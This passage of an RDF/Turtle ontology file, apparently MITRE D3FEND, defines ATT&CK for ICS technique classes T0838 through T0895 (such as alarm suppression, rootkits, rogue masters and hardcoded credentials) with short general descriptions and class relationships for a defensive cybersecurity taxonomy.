disruptions and hazards to personnel." ; rdfs:subClassOf d3f:ATTACKICSImpactTechnique ; skos:prefLabel "Loss of Protection" . d3f:T0838 a owl:Class ; rdfs:label "Modify Alarm Settings - ATTACK ICS" ; d3f:attack-id "T0838" ; d3f:definition "Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes." ; rdfs:subClassOf d3f:ATTACKICSInhibitResponseFunctionTechnique ; skos:prefLabel "Modify Alarm Settings" . d3f:T0839 a owl:Class ; rdfs:label "Module Firmware - ATTACK ICS" ; d3f:attack-id "T0839" ; d3f:definition "Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment." ; rdfs:subClassOf d3f:ATTACKICSImpairProcessControlTechnique, d3f:ATTACKICSPersistenceTechnique ; skos:prefLabel "Module Firmware" . d3f:T0840 a owl:Class ; rdfs:label "Network Connection Enumeration - ATTACK ICS" ; d3f:attack-id "T0840" ; d3f:definition "Adversaries may perform network connection enumeration to discover information about device communication patterns. If an adversary can inspect the state of a network connection with tools, such as Netstat(Citation: Netstat), in conjunction with [System Firmware](https://attack.mitre.org/techniques/T0857), then they can determine the role of certain devices on the network (Citation: MITRE). The adversary can also use [Network Sniffing](https://attack.mitre.org/techniques/T0842) to watch network traffic for details about the source, destination, protocol, and content." ; rdfs:subClassOf d3f:ATTACKICSDiscoveryTechnique ; skos:prefLabel "Network Connection Enumeration" . d3f:T0841 a owl:Class ; rdfs:label "Network Service Scanning - ATTACK ICS" ; d3f:attack-id "T0841" ; d3f:definition "Network Service Scanning is the process of discovering services on networked systems. This can be achieved through a technique called port scanning or probing. Port scanning interacts with the TCP/IP ports on a target system to determine whether ports are open, closed, or filtered by a firewall. This does not reveal the service that is running behind the port, but since many common services are run on [https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml specific port numbers], the type of service can be assumed. More in-depth testing includes interaction with the actual service to determine the service type and specific version. One of the most-popular tools to use for Network Service Scanning is [https://nmap.org/ Nmap]." ; rdfs:comment "This technique has been deprecated." ; rdfs:subClassOf d3f:ATTACKICSDiscoveryTechnique ; owl:deprecated true ; skos:prefLabel "Network Service Scanning" . d3f:T0842 a owl:Class ; rdfs:label "Network Sniffing - ATTACK ICS" ; d3f:attack-id "T0842" ; d3f:definition "Network sniffing is the practice of using a network interface on a computer system to monitor or capture information (Citation: Enterprise ATT&CK January 2018) regardless of whether it is the specified destination for the information." ; rdfs:subClassOf d3f:ATTACKICSDiscoveryTechnique ; skos:prefLabel "Network Sniffing" . d3f:T0843 a owl:Class ; rdfs:label "Program Download - ATTACK ICS" ; d3f:attack-id "T0843" ; d3f:definition "Adversaries may perform a program download to transfer a user program to a controller." ; rdfs:subClassOf d3f:ATTACKICSLateralMovementTechnique ; skos:prefLabel "Program Download" . d3f:T0844 a owl:Class ; rdfs:label "Program Organization Units - ATTACK ICS" ; d3f:attack-id "T0844" ; d3f:definition "Program Organizational Units (POUs) are block structures used within PLC programming to create programs and projects. (Citation: Guidance - IEC61131) POUs can be used to hold user programs written in IEC 61131-3 languages: Structured text, Instruction list, Function block, and Ladder logic. (Citation: Guidance - IEC61131) Application - 201203 They can also provide additional functionality, such as establishing connections between the PLC and other devices using TCON. (Citation: PLCBlaster - Spenneberg)" ; rdfs:comment "This technique has been deprecated." ; rdfs:subClassOf d3f:ATTACKICSExecutionTechnique, d3f:ATTACKICSLateralMovementTechnique ; owl:deprecated true ; skos:prefLabel "Program Organization Units" . d3f:T0845 a owl:Class ; rdfs:label "Program Upload - ATTACK ICS" ; d3f:attack-id "T0845" ; d3f:definition "Adversaries may attempt to upload a program from a PLC to gather information about an industrial process. Uploading a program may allow them to acquire and study the underlying logic. Methods of program upload include vendor software, which enables the user to upload and read a program running on a PLC. This software can be used to upload the target program to a workstation, jump box, or an interfacing device." ; rdfs:subClassOf d3f:ATTACKICSCollectionTechnique ; skos:prefLabel "Program Upload" . d3f:T0846 a owl:Class ; rdfs:label "Remote System Discovery - ATTACK ICS" ; d3f:attack-id "T0846" ; d3f:definition "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques. Functionality could exist within adversary tools to enable this, but utilities available on the operating system or vendor software could also be used. (Citation: Enterprise ATT&CK January 2018)" ; rdfs:subClassOf d3f:ATTACKICSDiscoveryTechnique ; skos:prefLabel "Remote System Discovery" . d3f:T0847 a owl:Class ; rdfs:label "Replication Through Removable Media - ATTACK ICS" ; d3f:attack-id "T0847" ; d3f:definition "Adversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment. The adversary may rely on unknowing trusted third parties, such as suppliers or contractors with access privileges, to introduce the removable media. This technique enables initial access to target devices that never connect to untrusted networks, but are physically accessible." ; rdfs:subClassOf d3f:ATTACKICSInitialAccessTechnique ; skos:prefLabel "Replication Through Removable Media" . d3f:T0848 a owl:Class ; rdfs:label "Rogue Master - ATTACK ICS" ; d3f:attack-id "T0848" ; d3f:definition "Adversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection." ; rdfs:subClassOf d3f:ATTACKICSInitialAccessTechnique ; skos:prefLabel "Rogue Master" . d3f:T0849 a owl:Class ; rdfs:label "Masquerading - ATTACK ICS" ; d3f:attack-id "T0849" ; d3f:definition "Adversaries may use masquerading to disguise a malicious application or executable as another file, to avoid operator and engineer suspicion. Possible disguises of these masquerading files can include commonly found programs, expected vendor executables and configuration files, and other commonplace application and naming conventions. By impersonating expected and vendor-relevant files and applications, operators and engineers may not notice the presence of the underlying malicious content and possibly end up running those masquerading as legitimate functions." ; rdfs:subClassOf d3f:ATTACKICSEvasionTechnique ; skos:prefLabel "Masquerading" . d3f:T0850 a owl:Class ; rdfs:label "Role Identification - ATTACK ICS" ; d3f:attack-id "T0850" ; d3f:definition "Adversaries may perform role identification of devices involved with physical processes of interest in a target control system. Control systems devices often work in concert to control a physical process. Each device can have one or more roles that it performs within that control process. By collecting this role-based data, an adversary can construct a more targeted attack." ; rdfs:comment "This technique has been deprecated." ; rdfs:subClassOf d3f:ATTACKICSCollectionTechnique ; owl:deprecated true ; skos:prefLabel "Role Identification" . d3f:T0851 a owl:Class ; rdfs:label "Rootkit - ATTACK ICS" ; d3f:attack-id "T0851" ; d3f:definition "Adversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting and modifying operating-system API calls that supply system information. Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system, or lower. (Citation: Enterprise ATT&CK January 2018)" ; rdfs:subClassOf d3f:ATTACKICSEvasionTechnique, d3f:ATTACKICSInhibitResponseFunctionTechnique ; skos:prefLabel "Rootkit" . d3f:T0852 a owl:Class ; rdfs:label "Screen Capture - ATTACK ICS" ; d3f:attack-id "T0852" ; d3f:definition "Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. (Citation: ICS-CERT October 2017) Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices." ; rdfs:subClassOf d3f:ATTACKICSCollectionTechnique ; skos:prefLabel "Screen Capture" . d3f:T0853 a owl:Class ; rdfs:label "Scripting - ATTACK ICS" ; d3f:attack-id "T0853" ; d3f:definition "Adversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter. Scripting languages are programming languages that differ from compiled languages, in that scripting languages use an interpreter, instead of a compiler. These interpreters read and compile part of the source code just before it is executed, as opposed to compilers, which compile each and every line of code to an executable file. Scripting allows software developers to run their code on any system where the interpreter exists. This way, they can distribute one package, instead of precompiling executables for many different systems. Scripting languages, such as Python, have their interpreters shipped as a default with many Linux distributions." ; rdfs:subClassOf d3f:ATTACKICSExecutionTechnique ; skos:prefLabel "Scripting" . d3f:T0854 a owl:Class ; rdfs:label "Serial Connection Enumeration - ATTACK ICS" ; d3f:attack-id "T0854" ; d3f:definition "Adversaries may perform serial connection enumeration to gather situational awareness after gaining access to devices in the OT network. Control systems devices often communicate to each other via various types of serial communication mediums. These serial communications are used to facilitate informational communication, as well as commands. Serial Connection Enumeration differs from I/O Module Discovery, as I/O modules are auxiliary systems to the main system, and devices that are connected via serial connection are normally discrete systems." ; rdfs:comment "This technique has been deprecated." ; rdfs:subClassOf d3f:ATTACKICSDiscoveryTechnique ; owl:deprecated true ; skos:prefLabel "Serial Connection Enumeration" . d3f:T0855 a owl:Class ; rdfs:label "Unauthorized Command Message - ATTACK ICS" ; d3f:attack-id "T0855" ; d3f:definition "Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)" ; rdfs:subClassOf d3f:ATTACKICSImpairProcessControlTechnique ; skos:prefLabel "Unauthorized Command Message" . d3f:T0856 a owl:Class ; rdfs:label "Spoof Reporting Message - ATTACK ICS" ; d3f:attack-id "T0856" ; d3f:definition "Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values." ; rdfs:subClassOf d3f:ATTACKICSEvasionTechnique, d3f:ATTACKICSImpairProcessControlTechnique ; skos:prefLabel "Spoof Reporting Message" . d3f:T0857 a owl:Class ; rdfs:label "System Firmware - ATTACK ICS" ; d3f:attack-id "T0857" ; d3f:definition "System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprograming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network." ; rdfs:subClassOf d3f:ATTACKICSInhibitResponseFunctionTechnique, d3f:ATTACKICSPersistenceTechnique ; skos:prefLabel "System Firmware" . d3f:T0858 a owl:Class ; rdfs:label "Change Operating Mode - ATTACK ICS" ; d3f:attack-id "T0858" ; d3f:definition "Adversaries may change the operating mode of a controller to gain additional access to engineering functions such as Program Download. Programmable controllers typically have several modes of operation that control the state of the user program and control access to the controllers API. Operating modes can be physically selected using a key switch on the face of the controller but may also be selected with calls to the controllers API. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below:" ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:modifies ; owl:someValuesFrom d3f:OTControllerOperatingMode ], d3f:ATTACKICSEvasionTechnique, d3f:ATTACKICSExecutionTechnique ; skos:prefLabel "Change Operating Mode" . d3f:T0859 a owl:Class ; rdfs:label "Valid Accounts - ATTACK ICS" ; d3f:attack-id "T0859" ; d3f:definition "Adversaries may steal the credentials of a specific user or service account using credential access techniques. In some cases, default credentials for control system devices may be publicly available. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network, and may even be used for persistent access to remote systems. Compromised and default credentials may also grant an adversary increased privilege to specific systems and devices or access to restricted areas of the network. Adversaries may choose not to use malware or tools, in conjunction with the legitimate access those credentials provide, to make it harder to detect their presence or to control devices and send legitimate commands in an unintended way." ; rdfs:subClassOf d3f:ATTACKICSLateralMovementTechnique, d3f:ATTACKICSPersistenceTechnique ; skos:prefLabel "Valid Accounts" . d3f:T0860 a owl:Class ; rdfs:label "Wireless Compromise - ATTACK ICS" ; d3f:attack-id "T0860" ; d3f:definition "Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: Alexander Bolshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev March 2014) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance." ; rdfs:subClassOf d3f:ATTACKICSInitialAccessTechnique ; skos:prefLabel "Wireless Compromise" . d3f:T0861 a owl:Class ; rdfs:label "Point & Tag Identification - ATTACK ICS" ; d3f:attack-id "T0861" ; d3f:definition "Adversaries may collect point and tag values to gain a more comprehensive understanding of the process environment. Points may be values such as inputs, memory locations, outputs or other process specific variables. (Citation: Dennis L. Sloatman September 2016) Tags are the identifiers given to points for operator convenience." ; rdfs:subClassOf d3f:ATTACKICSCollectionTechnique ; skos:prefLabel "Point & Tag Identification" . d3f:T0862 a owl:Class ; rdfs:label "Supply Chain Compromise - ATTACK ICS" ; d3f:attack-id "T0862" ; d3f:definition "Adversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows. Supply chain compromise is the manipulation of products, such as devices or software, or their delivery mechanisms before receipt by the end consumer. Adversary compromise of these products and mechanisms is done for the goal of data or system compromise, once infected products are introduced to the target environment." ; rdfs:subClassOf d3f:ATTACKICSInitialAccessTechnique ; skos:prefLabel "Supply Chain Compromise" . d3f:T0863 a owl:Class ; rdfs:label "User Execution - ATTACK ICS" ; d3f:attack-id "T0863" ; d3f:definition "Adversaries may rely on a targeted organizations user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents." ; rdfs:subClassOf d3f:ATTACKICSExecutionTechnique ; skos:prefLabel "User Execution" . d3f:T0864 a owl:Class ; rdfs:label "Transient Cyber Asset - ATTACK ICS" ; d3f:attack-id "T0864" ; d3f:definition "Adversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: North American Electric Reliability Corporation June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required." ; rdfs:subClassOf d3f:ATTACKICSInitialAccessTechnique ; skos:prefLabel "Transient Cyber Asset" . d3f:T0865 a owl:Class ; rdfs:label "Spearphishing Attachment - ATTACK ICS" ; d3f:attack-id "T0865" ; d3f:definition "Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T0863) to gain execution and access. (Citation: Enterprise ATT&CK October 2019)" ; rdfs:subClassOf d3f:ATTACKICSInitialAccessTechnique ; skos:prefLabel "Spearphishing Attachment" . d3f:T0866 a owl:Class ; rdfs:label "Exploitation of Remote Services - ATTACK ICS" ; d3f:attack-id "T0866" ; d3f:definition "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse. A common goal for post-compromise exploitation of remote services is for initial access into and lateral movement throughout the ICS environment to enable access to targeted systems. (Citation: Enterprise ATT&CK)" ; rdfs:subClassOf d3f:ATTACKICSInitialAccessTechnique, d3f:ATTACKICSLateralMovementTechnique ; skos:prefLabel "Exploitation of Remote Services" . d3f:T0867 a owl:Class ; rdfs:label "Lateral Tool Transfer - ATTACK ICS" ; d3f:attack-id "T0867" ; d3f:definition "Adversaries may transfer tools or other files from one system to another to stage adversary tools or other files over the course of an operation. (Citation: Enterprise ATT&CK) Copying of files may also be performed laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares. (Citation: Enterprise ATT&CK)" ; rdfs:subClassOf d3f:ATTACKICSLateralMovementTechnique ; skos:prefLabel "Lateral Tool Transfer" . d3f:T0868 a owl:Class ; rdfs:label "Detect Operating Mode - ATTACK ICS" ; d3f:attack-id "T0868" ; d3f:definition "Adversaries may gather information about a PLCs or controllers current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g., run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below:" ; rdfs:subClassOf d3f:ATTACKICSCollectionTechnique ; skos:prefLabel "Detect Operating Mode" . d3f:T0869 a owl:Class ; rdfs:label "Standard Application Layer Protocol - ATTACK ICS" ; d3f:attack-id "T0869" ; d3f:definition "Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus. These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their associated port or in some cases over a non-standard port. Adversaries may use these protocols to reach out of the network for command and control, or in some cases to other infected devices within the network." ; rdfs:subClassOf d3f:ATTACKICSCommandAndControlTechnique ; skos:prefLabel "Standard Application Layer Protocol" . d3f:T0870 a owl:Class ; rdfs:label "Detect Program State - ATTACK ICS" ; d3f:attack-id "T0870" ; d3f:definition "Adversaries may seek to gather information about the current state of a program on a PLC. State information reveals information about the program, including whether it's running, halted, stopped, or has generated an exception. This information may be leveraged as a verification of malicious program execution or to determine if a PLC is ready to download a new program." ; rdfs:comment "This technique has been deprecated." ; rdfs:subClassOf d3f:ATTACKICSCollectionTechnique ; owl:deprecated true ; skos:prefLabel "Detect Program State" . d3f:T0871 a owl:Class ; rdfs:label "Execution through API - ATTACK ICS" ; d3f:attack-id "T0871" ; d3f:definition "Adversaries may attempt to leverage Application Program Interfaces (APIs) used for communication between control software and the hardware. Specific functionality is often coded into APIs which can be called by software to engage specific functions on a device or other software." ; rdfs:subClassOf d3f:ATTACKICSExecutionTechnique ; skos:prefLabel "Execution through API" . d3f:T0872 a owl:Class ; rdfs:label "Indicator Removal on Host - ATTACK ICS" ; d3f:attack-id "T0872" ; d3f:definition "Adversaries may attempt to remove indicators of their presence on a system in an effort to cover their tracks. In cases where an adversary may feel detection is imminent, they may try to overwrite, delete, or cover up changes they have made to the device." ; rdfs:subClassOf d3f:ATTACKICSEvasionTechnique ; skos:prefLabel "Indicator Removal on Host" . d3f:T0873 a owl:Class ; rdfs:label "Project File Infection - ATTACK ICS" ; d3f:attack-id "T0873" ; d3f:definition "Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. (Citation: Beckhoff) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further [Execution](https://attack.mitre.org/tactics/TA0104) and [Persistence](https://attack.mitre.org/tactics/TA0110) techniques. (Citation: PLCdev)" ; rdfs:subClassOf d3f:ATTACKICSPersistenceTechnique ; skos:prefLabel "Project File Infection" . d3f:T0874 a owl:Class ; rdfs:label "Hooking - ATTACK ICS" ; d3f:attack-id "T0874" ; d3f:definition "Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: Enterprise ATT&CK)" ; rdfs:subClassOf d3f:ATTACKICSExecutionTechnique, d3f:ATTACKICSPrivilegeEscalationTechnique ; skos:prefLabel "Hooking" . d3f:T0875 a owl:Class ; rdfs:label "Change Program State - ATTACK ICS" ; d3f:attack-id "T0875" ; d3f:definition "Adversaries may attempt to change the state of the current program on a control device. Program state changes may be used to allow for another program to take over control or be loaded onto the device." ; rdfs:comment "This technique has been deprecated." ; rdfs:subClassOf d3f:ATTACKICSExecutionTechnique, d3f:ATTACKICSImpairProcessControlTechnique ; owl:deprecated true ; skos:prefLabel "Change Program State" . d3f:T0877 a owl:Class ; rdfs:label "I/O Image - ATTACK ICS" ; d3f:attack-id "T0877" ; d3f:definition "Adversaries may seek to capture process values related to the inputs and outputs of a PLC. During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules." ; rdfs:subClassOf d3f:ATTACKICSCollectionTechnique ; skos:prefLabel "I/O Image" . d3f:T0878 a owl:Class ; rdfs:label "Alarm Suppression - ATTACK ICS" ; d3f:attack-id "T0878" ; d3f:definition "Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole." ; rdfs:subClassOf d3f:ATTACKICSInhibitResponseFunctionTechnique ; skos:prefLabel "Alarm Suppression" . d3f:T0879 a owl:Class ; rdfs:label "Damage to Property - ATTACK ICS" ; d3f:attack-id "T0879" ; d3f:definition "Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in [Loss of Safety](https://attack.mitre.org/techniques/T0880). Operations that result in [Loss of Control](https://attack.mitre.org/techniques/T0827) may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of [Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828)." ; rdfs:subClassOf d3f:ATTACKICSImpactTechnique ; skos:prefLabel "Damage to Property" . d3f:T0880 a owl:Class ; rdfs:label "Loss of Safety - ATTACK ICS" ; d3f:attack-id "T0880" ; d3f:definition "Adversaries may compromise safety system functions designed to maintain safe operation of a process when unacceptable or dangerous conditions occur. Safety systems are often composed of the same elements as control systems but have the sole purpose of ensuring the process fails in a predetermined safe manner." ; rdfs:subClassOf d3f:ATTACKICSImpactTechnique ; skos:prefLabel "Loss of Safety" . d3f:T0881 a owl:Class ; rdfs:label "Service Stop - ATTACK ICS" ; d3f:attack-id "T0881" ; d3f:definition "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. (Citation: Enterprise ATT&CK) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction. (Citation: Enterprise ATT&CK)" ; rdfs:subClassOf d3f:ATTACKICSInhibitResponseFunctionTechnique ; skos:prefLabel "Service Stop" . d3f:T0882 a owl:Class ; rdfs:label "Theft of Operational Information - ATTACK ICS" ; d3f:attack-id "T0882" ; d3f:definition "Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations. In the Bowman Dam incident, adversaries probed systems for operational data. (Citation: Mark Thompson March 2016) (Citation: Danny Yadron December 2015)" ; rdfs:subClassOf d3f:ATTACKICSImpactTechnique ; skos:prefLabel "Theft of Operational Information" . d3f:T0883 a owl:Class ; rdfs:label "Internet Accessible Device - ATTACK ICS" ; d3f:attack-id "T0883" ; d3f:definition "Adversaries may gain access into industrial environments through systems exposed directly to the internet for remote access rather than through [External Remote Services](https://attack.mitre.org/techniques/T0822). Internet Accessible Devices are exposed to the internet unintentionally or intentionally without adequate protections. This may allow for adversaries to move directly into the control system network. Access onto these devices is accomplished without the use of exploits, these would be represented within the [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T0819) technique." ; rdfs:subClassOf d3f:ATTACKICSInitialAccessTechnique ; skos:prefLabel "Internet Accessible Device" . d3f:T0884 a owl:Class ; rdfs:label "Connection Proxy - ATTACK ICS" ; d3f:attack-id "T0884" ; d3f:definition "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications." ; rdfs:subClassOf d3f:ATTACKICSCommandAndControlTechnique ; skos:prefLabel "Connection Proxy" . d3f:T0885 a owl:Class ; rdfs:label "Commonly Used Port - ATTACK ICS" ; d3f:attack-id "T0885" ; d3f:definition "Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol. They may use commonly open ports, such as the examples provided below." ; rdfs:subClassOf d3f:ATTACKICSCommandAndControlTechnique ; skos:prefLabel "Commonly Used Port" . d3f:T0886 a owl:Class ; rdfs:label "Remote Services - ATTACK ICS" ; d3f:attack-id "T0886" ; d3f:definition "Adversaries may leverage remote services to move between assets and network segments. These services are often used to allow operators to interact with systems remotely within the network, some examples are RDP, SMB, SSH, and other similar mechanisms. (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) (Citation: Dragos December 2017) (Citation: Joe Slowik April 2019)" ; rdfs:subClassOf d3f:ATTACKICSInitialAccessTechnique, d3f:ATTACKICSLateralMovementTechnique ; skos:prefLabel "Remote Services" . d3f:T0887 a owl:Class ; rdfs:label "Wireless Sniffing - ATTACK ICS" ; d3f:attack-id "T0887" ; d3f:definition "Adversaries may seek to capture radio frequency (RF) communication used for remote control and reporting in distributed environments. RF communication frequencies vary between 3 kHz to 300 GHz, although are commonly between 300 MHz to 6 GHz. (Citation: Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018) The wavelength and frequency of the signal affect how the signal propagates through open air, obstacles (e.g. walls and trees) and the type of radio required to capture them. These characteristics are often standardized in the protocol and hardware and may have an effect on how the signal is captured. Some examples of wireless protocols that may be found in cyber-physical environments are: WirelessHART, Zigbee, WIA-FA, and 700 MHz Public Safety Spectrum." ; rdfs:subClassOf d3f:ATTACKICSCollectionTechnique, d3f:ATTACKICSDiscoveryTechnique ; skos:prefLabel "Wireless Sniffing" . d3f:T0888 a owl:Class ; rdfs:label "Remote System Information Discovery - ATTACK ICS" ; d3f:attack-id "T0888" ; d3f:definition "An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the system's operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the system's configuration may be used to scope subsequent technique usage." ; rdfs:subClassOf d3f:ATTACKICSDiscoveryTechnique ; skos:prefLabel "Remote System Information Discovery" . d3f:T0889 a owl:Class ; rdfs:label "Modify Program - ATTACK ICS" ; d3f:attack-id "T0889" ; d3f:definition "Adversaries may modify or add a program on a controller to affect how it interacts with the physical process, peripheral devices and other hosts on the network. Modification to controller programs can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append." ; rdfs:subClassOf d3f:ATTACKICSPersistenceTechnique ; skos:prefLabel "Modify Program" . d3f:T0890 a owl:Class ; rdfs:label "Exploitation for Privilege Escalation - ATTACK ICS" ; d3f:attack-id "T0890" ; d3f:definition "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. (Citation: The MITRE Corporation)" ; rdfs:subClassOf d3f:ATTACKICSPrivilegeEscalationTechnique ; skos:prefLabel "Exploitation for Privilege Escalation" . d3f:T0891 a owl:Class ; rdfs:label "Hardcoded Credentials - ATTACK ICS" ; d3f:attack-id "T0891" ; d3f:definition "Adversaries may leverage credentials that are hardcoded in software or firmware to gain an unauthorized interactive user session to an asset. Examples credentials that may be hardcoded in an asset include:" ; rdfs:subClassOf d3f:ATTACKICSLateralMovementTechnique, d3f:ATTACKICSPersistenceTechnique ; skos:prefLabel "Hardcoded Credentials" . d3f:T0892 a owl:Class ; rdfs:label "Change Credential - ATTACK ICS" ; d3f:attack-id "T0892" ; d3f:definition "Adversaries may modify software and device credentials to prevent operator and responder access. Depending on the device, the modification or addition of this password could prevent any device configuration actions from being accomplished and may require a factory reset or replacement of hardware. These credentials are often built-in features provided by the device vendors as a means to restrict access to management interfaces." ; rdfs:subClassOf d3f:ATTACKICSInhibitResponseFunctionTechnique ; skos:prefLabel "Change Credential" . d3f:T0893 a owl:Class ; rdfs:label "Data from Local System - ATTACK ICS" ; d3f:attack-id "T0893" ; d3f:definition "Adversaries may target and collect data from local system sources, such as file systems, configuration files, or local databases. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes." ; rdfs:subClassOf d3f:ATTACKICSCollectionTechnique ; skos:prefLabel "Data from Local System" . d3f:T0894 a owl:Class ; rdfs:label "System Binary Proxy Execution - ATTACK ICS" ; d3f:attack-id "T0894" ; d3f:definition "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. (Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands. Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands. (Citation: split man page)(Citation: GTFO split)" ; rdfs:subClassOf d3f:ATTACKICSEvasionTechnique ; skos:prefLabel "System Binary Proxy Execution" . d3f:T0895 a owl:Class ; rdfs:label "Autorun Image - ATTACK ICS" ; d3f:attack-id "T0895" ; d3f:definition "Adversaries may leverage AutoRun functionality or scripts to execute malicious code. Devices configured to enable AutoRun functionality or legacy operating systems may be susceptible to abuse of these features to run malicious code stored on various forms of removeable media (i.e., USB, Disk Images [.ISO]). Commonly, AutoRun or AutoPlay are disabled in many operating systems configurations to 